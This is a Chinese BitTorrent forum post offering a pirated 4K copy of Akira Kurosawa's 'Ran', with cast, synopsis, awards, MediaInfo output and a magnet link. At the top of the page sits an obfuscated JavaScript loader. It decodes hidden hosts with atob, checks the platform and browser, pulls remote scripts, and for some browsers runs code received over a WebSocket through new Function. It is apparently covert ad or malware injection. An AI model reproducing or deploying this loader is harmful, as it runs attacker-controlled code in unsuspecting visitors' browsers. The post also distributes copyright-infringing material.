乱[中文字幕]RAN.1985.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-迅雷下载 21.29GB

版主小s 1月前 1487

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 乱 / 乱日本战国时代 / Revolt / Ran
◎年  代 1985
◎产  地 日本 / 法国
◎类  别 剧情 / 动作
◎语  言 日语
◎上映日期 1985-06-01(日本)
◎IMDb链接 https://www.imdb.com/title/tt0089881/
◎豆瓣评分 8.9/10 (68978人评价)
◎豆瓣链接 https://movie.douban.com/subject/1296196/
◎片  长 162分钟
◎导  演 黑泽明 Akira Kurosawa (id:1054529)
◎编  剧 黑泽明 Akira Kurosawa (id:1054529)
       小国英雄 Hideo Oguni (id:1131182)
       井手雅人 Masato Ide (id:1287279)
       威廉·莎士比亚 William Shakespeare (id:1044735)
◎演  员 仲代达矢 Tatsuya Nakadai (id:1036950)
       寺尾聪 Akira Terao (id:1045788)
       根津甚八 Jinpachi Nezu (id:1037931)
       隆大介 Daisuke Ry? (id:1145284)
       原田美枝子 Mieko Harada (id:1014550)
       宫崎美子 Yoshiko Miyazaki (id:1037559)
       井川比佐志 Hisashi Igawa (id:1042429)
       池畑慎之介 P?ta (id:1131097)
       油井昌由树 Masayuki Yui (id:1345593)
       加藤和夫 Kazuo Kat? (id:1015646)
       松井范雄 Norio Matsui (id:1002440)
       伊藤敏八 Toshiya Ito (id:1031084)
       儿玉谦次 Kenji Kodama (id:1021329)
       野村万斋 Mansai Nomura (id:1001242)
       加藤武 Takeshi Kat? (id:1019752)
       田崎润 Jun Tazaki (id:1025635)
       植木等 Hitoshi Ueki (id:1034433)
       头师孝雄 Takao Zushi (id:1013380)
       头师佳孝 Yoshitaka Zushi (id:1034029)
       天田益男 Masuo Amada (id:1008856)
       木村荣 Sakae Kimura (id:1051682)
       日比游一 Yuichi Hibi (id:1358543)
       加藤精三 Seiz? Kat? (id:1102698)
       南條玲子 Reiko Nanjo (id:1130237)
       音羽久米子 Kumeko Otowa (id:1011925)
       寺岛进 Susumu Terajima (id:1041631)
       东乡晴子 Haruko Togo (id:1035277)
       渡边哲 Tetsu Watanabe (id:1321530)
       宫坂广 Hiroshi Miyasaka (id:1339894)
       本多猪四郎  Ishir? Honda (id:1092208)
       井关惺 Satoru Iseki (id:1360216)
       塞尔·西尔伯曼 Serge Silberman (id:1048699)
       武满彻 T?ru Takemitsu (id:1028713)
       黑泽明 Akira Kurosawa (id:1054529)
       村木忍 Shinobu Muraki (id:1053793)
       和田惠美 Emi Wada (id:1033613)
       本多猪四郎  Ishir? Honda (id:1092208)
       小泉尧史 Takashi Koizumi (id:1042493)
       东乡晴子 Haruko Togo (id:1035277)

◎标  签 日本 / 战争 / 经典 / 历史 / 武士 / 人性 / 1985 / 剧情

◎简  介
  一文字秀虎(仲代达矢饰)征战多年,手段残忍。在七十岁时,秀虎准备将家业一分为三,由三个儿子分掌大权。他把太郎孝虎(寺尾聪饰)、次郎正虎(根津甚八饰)、三郎直虎(隆大介饰)叫到跟前,以“支箭会断,砚支箭折不断”喻语告诫三兄弟,嘱咐他们要休戚与共。三郎当场把三支箭横在膝上折断,以抗议父亲枉经乱世,而不知人情。秀虎大怒,将三郎驱逐出境。三郎遂到邻国入赘为婿。                                    
                                而之后一文字家果然被三郎言中,背信弃义的告诫果然成真,父子及兄弟间的纷乱开始,迎接他们的将是什么命运?

◎获奖情况 (共4项)
  第58届奥斯卡金像奖 (1986)
  最佳导演(提名)
   └──黑泽明 (id:1054529)
  最佳摄影(提名)
   └──中井朝一 (id:1051777)
   └──斋藤孝雄 (id:1141632)
   └──上田正治 (id:1149076)
  最佳艺术指导(提名)
   └──村木忍 (id:1053793)
   └──村木与四郎 (id:1025955)
  最佳服装设计
   └──和田惠美 (id:1033613)

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 280011464573072411253418719095719654916 (0xD2A83F16A56071EEDE7AE9AFF9BEF604)
  4. Complete name                            : [email protected]DDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 21.3 GiB
  8. Duration                                 : 2 h 40 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 19.0 Mb/s
  11. Movie name                               : RAN 1985 2160p HDR UHD BluRay DTS-HD MA 5.1 [email protected]
  12. Encoded date                             : UTC 2021-07-27 08:43:46
  13. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  14. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  15. Video
  16. ID                                       : 1
  17. Format                                   : HEVC
  18. Format/Info                              : High Efficiency Video Coding
  19. Format profile                           : Main [email protected]@High
  20. HDR format                               : SMPTE ST 2086, HDR10 compatible
  21. Codec ID                                 : V_MPEGH/ISO/HEVC
  22. Duration                                 : 2 h 40 min
  23. Bit rate                                 : 14.9 Mb/s
  24. Width                                    : 3 840 pixels
  25. Height                                   : 2 072 pixels
  26. Display aspect ratio                     : 1.85:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 24.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 10 bits
  32. Bits/(Pixel*Frame)                       : 0.078
  33. Stream size                              : 16.7 GiB (79%)
  34. Title                                    : @HDSky
  35. Writing library                          : x265 - H.265/HEVC codec
  36. Default                                  : Yes
  37. Forced                                   : No
  38. Color range                              : Limited
  39. Color primaries                          : BT.2020
  40. Transfer characteristics                 : PQ
  41. Matrix coefficients                      : BT.2020 non-constant
  42. Mastering display color primaries        : BT.2020
  43. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2
  44. Maximum Content Light Level              : 739 cd/m2
  45. Maximum Frame-Average Light Level        : 331 cd/m2
  46. Audio
  47. ID                                       : 2
  48. Format                                   : DTS XLL
  49. Format/Info                              : Digital Theater Systems
  50. Commercial name                          : DTS-HD Master Audio
  51. Codec ID                                 : A_DTS
  52. Duration                                 : 2 h 40 min
  53. Bit rate mode                            : Variable
  54. Bit rate                                 : 4 063 kb/s
  55. Channel(s)                               : 6 channels
  56. Channel layout                           : C L R Ls Rs LFE
  57. Sampling rate                            : 48.0 kHz
  58. Frame rate                               : 93.750 FPS (512 SPF)
  59. Bit depth                                : 24 bits
  60. Compression mode                         : Lossless
  61. Stream size                              : 4.56 GiB (21%)
  62. Title                                    : Japanese
  63. Language                                 : Japanese
  64. Default                                  : Yes
  65. Forced                                   : No
  66. Text #1
  67. ID                                       : 3
  68. Format                                   : PGS
  69. Muxing mode                              : zlib
  70. Codec ID                                 : S_HDMV/PGS
  71. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  72. Duration                                 : 2 h 32 min
  73. Bit rate                                 : 9 817 b/s
  74. Count of elements                        : 2210
  75. Stream size                              : 10.7 MiB (0%)
  76. Title                                    : CHS
  77. Language                                 : Chinese
  78. Default                                  : Yes
  79. Forced                                   : No
  80. Text #2
  81. ID                                       : 4
  82. Format                                   : PGS
  83. Muxing mode                              : zlib
  84. Codec ID                                 : S_HDMV/PGS
  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  86. Duration                                 : 2 h 32 min
  87. Bit rate                                 : 10.1 kb/s
  88. Count of elements                        : 2210
  89. Stream size                              : 11.0 MiB (0%)
  90. Title                                    : CHT
  91. Language                                 : Chinese
  92. Default                                  : No
  93. Forced                                   : No
  94. Menu
  95. 00:00:00.000                             : en:Chapter 01
  96. 00:12:09.833                             : en:Chapter 02
  97. 00:26:00.958                             : en:Chapter 03
  98. 00:38:47.958                             : en:Chapter 04
  99. 00:51:34.625                             : en:Chapter 05
  100. 01:04:11.125                             : en:Chapter 06
  101. 01:17:57.750                             : en:Chapter 07
  102. 01:28:56.000                             : en:Chapter 08
  103. 01:43:54.000                             : en:Chapter 09
  104. 01:59:30.667                             : en:Chapter 10
  105. 02:14:42.708                             : en:Chapter 11
  106. 02:33:02.125                             : en:Chapter 12


TAGS 动作 剧情

磁力链:
  • magnet:?xt=urn:btih:E18C20D61662CC91FA0A1772F3A24A1D6205ADE3
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回